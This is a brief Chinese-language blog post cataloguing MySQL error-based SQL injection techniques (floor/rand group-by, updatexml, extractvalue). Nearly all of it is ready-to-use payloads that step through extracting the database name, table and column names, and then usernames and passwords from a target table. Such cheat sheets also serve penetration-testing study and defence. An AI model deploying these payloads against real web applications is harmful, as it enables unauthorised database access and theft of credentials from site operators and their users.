SQL报错注入总结

Posted 2020-11-17 98lucifer

1.Floor()报错注入

关于Floor报错注入原理可以看http://blog.51cto.com/wt7315/1891458

获取数据库

select count(*),(concat(0x3a,database(),0x3a,floor(rand()*2))) name from information_schema.tables group by name; 

获取表名

select count(*),concat(0x3a,0x3a,(select table_name from information_schema.tables where table_schema=‘bypass‘ limit 1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

获取字段名

select count(*),concat(0x3a,0x3a,(select column_name from information_schema.columns where table_name=‘pass‘ limit 0,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

获取内容

select count(*),concat(0x3a,0x3a,(select username from pass limit 1,1),0x3a,floor(rand()*2)) name from information_schema.tables group by name;

2.updatexml报错注入

updatexml的爆错原因很简单，updatexml第二个参数需要的是Xpath格式的字符串。我们输入的显然不符合。故报错由此报错。

获取数据库

select updatexml(0,concat(0x7e,(select database())),0);

获取表名

select updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0);

获取字段

select updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name=‘pass‘ limit 1,1)),0);

获取内容

select updatexml(0,concat(0x7e,(SELECT concat(password) FROM pass limit 0,1)),0);

3.extractvalue()

select extractvalue(1,concat(0x7e,(select user()),0x7e));

剩下的就不一一列出来了，有兴趣的可以去查一下